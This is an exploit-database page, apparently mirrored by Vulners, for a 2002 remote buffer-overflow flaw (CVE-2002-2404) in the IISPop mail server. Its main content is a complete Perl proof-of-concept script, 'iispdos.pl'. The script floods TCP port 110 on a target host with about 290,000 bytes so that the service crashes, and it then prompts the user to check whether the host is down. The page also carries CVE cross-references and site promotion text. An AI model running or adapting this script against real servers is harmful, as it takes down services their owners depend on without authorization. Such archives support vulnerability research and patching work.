Lucene search
+L

IISPop 1.161/1.181 - Remote Buffer Overflow (Denial of Service) (PoC)

🗓️ 14 Nov 2002 00:00:00Reported by securma massineType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 25 Views

IISPop has a buffer overflow vulnerability that can cause denial of service via large data input.

Related
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2002-2404
1 Nov 200717:00
cve
Cvelist
CVE-2002-2404
1 Nov 200717:00
cvelist
EUVD
EUVD-2002-2382
7 Oct 202500:30
euvd
NVD
CVE-2002-2404
31 Dec 200205:00
nvd
source: https://www.securityfocus.com/bid/6183/info

IISPop is vulnerable to a denial of service caused by a buffer overflow. By sending an unusually large amount of data to IISPop on TCP port 110, the application will terminate with an access violation. Arbitrary code execution may be possible.

#!/usr/bin/perl -w
# tool : iispdos.pl
# shutdown all version of IISPop
# greetz crack.fr , marocit ,christal
#

use IO::Socket;

$ARGC=@ARGV;
if ($ARGC !=1) {
print "\n-->";
print "\tUsage: perl iispdos.pl <host> \n";
exit;
}

$remo = $ARGV[0];
$buffer = "A" x 289999;

print "\n-->";
print "\tconnection with $remo\n";
unless ($so = IO::Socket::INET->new (Proto => "TCP",
PeerAddr => $remo,
PeerPort
=> "110"))
{
print "-->";
print "\tConnection Failed...\n";
exit;
}
print $so "$buffer\n";
close $so;

print "-->";
print "\tnow test if the distant host is down\n";
exit;

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 Oct 2012 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.02918
25